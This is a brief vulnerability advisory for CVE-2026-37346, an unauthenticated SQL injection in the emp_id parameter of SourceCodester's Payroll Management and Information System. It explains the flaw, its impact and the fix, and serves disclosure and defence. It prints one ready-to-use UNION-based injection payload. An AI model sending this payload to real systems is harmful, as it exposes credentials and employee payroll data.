CVE-2026-37346

SourceCodester Payroll Management and Information System v1.0 contains a SQL injection vulnerability in the /payroll/view_account.php?emp_id= endpoint. The emp_id parameter is directly concatenated into SQL queries without sanitization or parameterization, leading to a classic SQL injection flaw [1]. The application, built on PHP 8.1 with XAMPP, uses a simple GET request to fetch employee account data.

Exploitation requires no authentication; the attacker simply sends a crafted GET request to /payroll/view_account.php?emp_id= with a malicious payload. For example, a payload such as 0%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ performs a UNION-based injection that can reveal the database name (e.g., 'payroll') and any other data from the database tables [1]. The attack is low complexity and can be executed from any network position.

Successful exploitation allows an attacker to extract arbitrary data from the database, including administrative credentials, employee records, payroll data, and other sensitive information. Since the database contains the application's backend data, an attacker could escalate to account takeovers or further compromise the system [1].

As of the published date (April 2026), the vendor (SourceCodester) has not released a patch, and the product remains vulnerable. Users should apply input validation and use prepared statements to mitigate the risk. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog at this time.